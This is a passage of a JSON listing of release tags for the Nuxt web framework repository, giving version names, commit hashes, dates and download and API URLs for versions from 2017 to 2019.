,{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000